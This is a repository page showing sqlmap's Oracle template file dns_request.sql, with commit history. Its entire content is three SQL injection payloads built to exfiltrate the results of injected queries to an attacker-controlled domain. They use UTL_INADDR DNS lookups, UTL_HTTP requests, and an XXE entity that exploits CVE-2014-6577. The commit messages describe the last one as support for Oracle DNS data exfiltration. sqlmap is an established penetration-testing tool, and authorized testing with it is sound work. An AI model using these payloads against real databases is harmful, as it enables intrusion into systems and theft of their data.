sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
a79ed52463
sqlmap/data/procs/oracle/dns_request.sql

4 lines
397 B
MySQL
Raw Normal View History

minor refactoring
2012-04-03 23:09:35 +04:00
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
add support to leverage CVE-2014-6577 for Oracle DNS data exfiltration (#5410) Co-authored-by: marvin <marvin@debian-BULLSEYE-live-builder-AMD64>
2023-05-25 12:27:15 +03:00
# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual
Reference in New Issue Copy Permalink